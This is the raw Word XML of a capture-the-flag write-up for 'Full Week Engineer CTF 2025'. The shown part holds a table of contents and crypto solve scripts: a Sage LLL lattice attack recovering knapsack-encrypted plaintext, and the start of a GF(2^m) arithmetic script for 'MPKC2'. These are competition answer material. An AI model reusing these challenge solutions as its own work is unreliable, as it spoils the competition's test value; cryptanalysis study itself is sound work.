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829A1" w14:textId="6C41CD39" w:rsidR="005838A0" w:rsidRPr="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="00B0F0"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E468574" wp14:editId="2E079E8C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1202267</wp:posOffset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608320121" name="Picture 2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0121" name="Picture 2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38A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="00B0F0"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48F2685B" wp14:editId="2F1BCE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10847272" name="Picture 1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7272" name="Picture 1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8A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1C3GH3TT0 – JUKE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C9B60" w14:textId="2B77BC67" w:rsidR="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WRITEUPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03990538" w14:textId="77777777" w:rsidR="005838A0" w:rsidRPr="00BC5416" w:rsidRDefault="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8F7328" w14:textId="3FC971CE" w:rsidR="005838A0" w:rsidRPr="00D31FC9" w:rsidRDefault="00587C0C" w:rsidP="005838A0">
      <w:pPr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Full Week Engineer CTF 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B5C0E" w14:textId="77777777" w:rsidR="00A96003" w:rsidRPr="00AA3958" w:rsidRDefault="00A96003" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0672A9" w14:textId="4DA74EEF" w:rsidR="00A96003" w:rsidRPr="00960686" w:rsidRDefault="00587C0C" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consol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8C1785" wp14:editId="344DB6E6">
            <wp:extent cx="2209524" cy="1971429"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="152886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80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4D1C" w14:textId="77777777" w:rsidR="0018145A" w:rsidRPr="00BC5416" w:rsidRDefault="0018145A" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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1615629341"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7ABB6483" w14:textId="08F8F4C6" w:rsidR="0018145A" w:rsidRDefault="002A437D" w:rsidP="00A513EE">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002A437D">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:t>Categories</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="262B2A7B" w14:textId="77777777" w:rsidR="00A513EE" w:rsidRPr="00A513EE" w:rsidRDefault="00A513EE" w:rsidP="00A513EE">
          <w:pPr>
            <w:rPr>
              <w:lang w:val="en-GB" w:eastAsia="el-GR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7AC73DD3" w14:textId="061E74B6" w:rsidR="00254858" w:rsidRPr="00254858" w:rsidRDefault="002A437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 w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc207539461" w:history="1">
            <w:r w:rsidR="00254858" w:rsidRPr="00254858">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Crypto</w:t>
            </w:r>
            <w:r w:rsidR="00254858" w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00254858" w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00254858" w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc207539461 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00254858" w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00254858"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3</w:t>
            </w:r>
            <w:r w:rsidR="00254858"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489BC60E" w14:textId="7F82EADE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2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baby-crypto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_Toc207539462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1B09F169" w14:textId="332FCFE9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3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Load x Limit x Loot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_Toc207539463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77F1951" w14:textId="00F3B5F4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4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MPKC2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_Toc207539464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5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11FB1FE8" w14:textId="0442737B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hyperlink w:anchor="_Toc207539465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Reverse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_Toc207539465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A03B4D6" w14:textId="46162770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6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strings-jacking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_Toc207539466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2B3D605E" w14:textId="540B4DAB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7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Mystery Zone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_Toc207539467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CA6BBD4" w14:textId="74D764AD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68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No need Logical Thinking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_Toc207539468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5380B15F" w14:textId="1B58783C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hyperlink w:anchor="_Toc207539469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Misc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_Toc207539469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14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0B215F02" w14:textId="7BBCEF0E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0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Poison Apple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_Toc207539470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14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1A468CDF" w14:textId="20EC91E1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1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Flagcraft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_Toc207539471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14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1F9702E2" w14:textId="0EEC642A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2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Adversarial Login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_Toc207539472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15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7F565098" w14:textId="1CB32227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3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Save the Kappa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_Toc207539473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18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2D5ED5C6" w14:textId="5926D265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hyperlink w:anchor="_Toc207539474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Forensics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_Toc207539474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2A3BDED4" w14:textId="751B5FD7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5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RSA Phone Tree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_Toc207539475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55E032F2" w14:textId="35E76085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6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datamosh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_Toc207539476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23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150F5624" w14:textId="14C91FA7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7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QR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_Toc207539477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24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08686FF5" w14:textId="7EC23689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78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git predator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_Toc207539478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24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299BCB6B" w14:textId="20A562A7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hyperlink w:anchor="_Toc207539479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OSINT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_Toc207539479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25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58D7914D" w14:textId="6BF59155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80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GeoGuessr3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_Toc207539480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25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0EE111C" w14:textId="03A70124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81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GeoGuessr4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_Toc207539481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25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28134CB8" w14:textId="06EB53BD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82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Exit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_Toc207539482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26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0772F7C1" w14:textId="28C5BF6E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83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Osaka Expo Pavilion Quiz!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_Toc207539483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26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0975079" w14:textId="501694E5" w:rsidR="00254858" w:rsidRPr="00254858" w:rsidRDefault="0025485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u w:val="single"/>
              <w:lang w:eastAsia="el-GR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">  </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc207539484" w:history="1">
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MYAKUMYAKU TOWER</w:t>
            </w:r>
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc207539484 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009937F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidRPr="00254858">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64A0C1D9" w14:textId="27F715FD" w:rsidR="002A437D" w:rsidRPr="00A513EE" w:rsidRDefault="002A437D">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="57625DBF" w14:textId="77777777" w:rsidR="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8BD6B8" w14:textId="77777777" w:rsidR="0018145A" w:rsidRDefault="0018145A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="030FF871" w14:textId="3DF94726" w:rsidR="00587C0C" w:rsidRDefault="00587C0C" w:rsidP="00243F90">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc207539461"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6083C264" w14:textId="52FCEABD" w:rsidR="00042C6D" w:rsidRDefault="00587C0C" w:rsidP="00587C0C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" w:name="_Toc207539462"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>baby-crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0DE70B2F" w14:textId="3D4F80C4" w:rsidR="00587C0C" w:rsidRDefault="00B3780B" w:rsidP="00587C0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3780B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0BB991" wp14:editId="6EC7DABE">
            <wp:extent cx="1562318" cy="771633"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6960122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12276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ABB" w14:textId="596E73EC" w:rsidR="007B4200" w:rsidRDefault="007B4200" w:rsidP="007B4200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2" w:name="_Toc207539463"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Load x Limit x Loot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="37A60E94" w14:textId="192B14DD" w:rsidR="007B4200" w:rsidRPr="007B4200" w:rsidRDefault="007B4200" w:rsidP="007B4200">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D63877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1.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sage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all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="0540F517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2.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8072E40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3.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Public key and ciphertext from output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36861E40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4.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P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46370304604399661103510587278608860854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161470033739550046992102957507284694793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30543660898063616156789781040944567751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250664599838920908776562323596516643000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139374138362514071242477757778171360453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123592723058786214120596739563194410238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211661190966175954206312604476025891883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204127984470558401029942508675826118636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226485320614749484977835154691419711643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316359778276308230428825295117172452569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223595536749391578996034934226276385201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285194897737688239593933128294126253420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106767966397120299297689471215328740769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25599906753022130965000372964020080374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99461971332517921483061891799425259113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94027794705920646966871149109862801610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123296061030051008330943248360079826013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74854535529342502478954289154224576092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224885683431821751400008043275824815646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266096166425088007499970985584050784682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276003343849704749424463898987980442737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102681588182470124247526654172102644907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81066074715052040596846980190467140543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288564406824785492891304803256068657153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275777490926285666099408286534129620445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282517686156702650031304218971561203305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303283907912734438658673255308488382253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207124905215590627556917580593810100294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280558080079068849809690254471376167991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160954151682440634237745640217189791793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97767119790212416603441928990664031378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338144640821518318947395128924719917222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175619923321070422554784972534849507595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254564156262627389965162628894875365269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196177539698888734927195275991945056566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316218059699388548025737940688917830572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268400154682066693679616423870021647142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215171060317966594124409556912523500752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260057877459608494186977306109025707665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lastRenderedPageBreak/>
        <w:t>190102548117865681721849886759598482779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252725419899497668403547022908880618059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327335827827878566866970242836185642452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188260325012018828319115719433455849371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88483421141682536040965596554472029136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310248075203863607523992695030757874632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295640402932812162029270725799625344492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70276872614365224915426973058582085536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256094493760578638941104549543294911438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42841363734929118457515014374580961350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128080761902152925446804036416229034376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180236556373329949311891716497015905345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109842713274004118912686485592449650056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193653151004110836304303931934828586594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217480566371177947463788535587066608900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85737645843034151047932615174569760367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75130577098367771493769881166880018519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44108879264846109022147939103515256917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200510426260508215019844361235980313468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57239393388118598756306963809052694810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285120374875743578681171629134755246113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310860836570193120117077183155691495035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251862421155813445159906426270135772925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301796605933628926886822581638474528587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338556933792869391731776683003533084480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2433E49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5.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8B969D5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6.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C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gramStart"/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6431903975558659411995736450941742463678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6798319334988101743518674132084696585109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6515613864583459558948036293342639545155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7773122108332461536899295384273685725884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7116134977799359563372944976071555756181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6933621053828258679307411351393495758849</w:t>
      </w:r>
      <w:proofErr w:type="gram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7C1DFF1F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7.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5D13416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8.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bits_to_bytes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bits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5C7F227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 9.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008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"""Convert a list of 64 bits (big-endian) to 8 bytes."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1AAEB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10.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bytes_out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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4F26D0A9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11.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F1FD4B0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12.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byte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232F2FFE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13.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450E4C2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14.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byte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byte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|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bits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0E64DD3E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15.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bytes_out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byte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E88432D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16.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bytes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bytes_out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C860344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17.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C383374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18.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 xml:space="preserve"># Recover </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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plaintext</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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for each ciphertext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AA443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19.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plaintext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7B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C5DE2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20.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B4A5BC6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21.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Create the lattice matrix (65 x 65)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFAF5E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22.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64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E78D7A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23.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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Matrix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ZZ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22B638E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24.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7596F714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25.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M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Identity matrix for x[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B91B8D2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26.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M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Public key A[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C222F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27.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Ciphertext -S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68535F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28.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053255F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29.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Apply LLL reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDA0C1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30.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reduced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LLL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0B9CCD87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31.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9857D7A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32.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Look for a short vector with last coordinate 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B6519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33.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reduced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8D23743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lastRenderedPageBreak/>
        <w:t xml:space="preserve">34.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[-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and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all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x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[:-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]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639EF49B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35.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Extract the first 64 elements as bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AD465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36.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bits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x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else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[:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>64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]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74530AB8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37.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Convert bits to bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF217E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38.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block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bits_to_bytes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bits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544A0F0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39.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plaintext </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+=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block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DED994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40. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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7B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="744DB3B1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41. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200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3F37E97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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">42. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Print the recovered plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C5946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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">43. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>print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 w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plaintext</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0993EA" w14:textId="77777777" w:rsidR="007B4200" w:rsidRPr="007B4200" w:rsidRDefault="007B420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6573759"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">44. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4200">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FB156" w14:textId="77777777" w:rsidR="00B3780B" w:rsidRDefault="00B3780B" w:rsidP="00587C0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4097ACC3" w14:textId="360000FE" w:rsidR="000A4765" w:rsidRDefault="000A4765" w:rsidP="000A4765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3" w:name="_Toc207539464"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MPKC2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6FEA9C1D" w14:textId="1DB6468E" w:rsidR="000A4765" w:rsidRPr="000A4765" w:rsidRDefault="000A4765" w:rsidP="000A4765">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4765">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6010780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dataclasses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dataclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72DA2E3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2.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typing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Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CB7B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3.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random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4991EF4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4.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Crypto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Util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number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bytes_to_long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long_to_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E956F4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5DAD3A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6.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bitdeg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6F5A36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bit_length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488B619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62AD0E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 9.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class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39D87A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init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__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Optional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]=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D6A326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</w:p>
    <w:p w14:paraId="4E1BF18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10EBC8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presets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4D62C4F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0b11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 + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612ABCE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0b111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x^2 + x + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9DB1D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3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0b1011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x^3 + x + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCBA0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4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0b10011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x^4 + x + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A9E5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5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0b100101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x^5 + x^2 + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8BDE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19.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0x11B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x^8 + x^4 + x^3 + x + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB1CE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569030F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presets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4B3614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 xml:space="preserve">"Please specify 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for this m"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0A7A9B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presets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B2607D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bitdeg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D0714A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degree must equal m"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3B00CD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</w:p>
    <w:p w14:paraId="43E909C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5E287BA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21C41C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29.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^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</w:p>
    <w:p w14:paraId="2115660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4CF7435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</w:p>
    <w:p w14:paraId="44DEB6D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res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2F1A5C2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while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14F426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8B24BC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35. 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res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^=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</w:p>
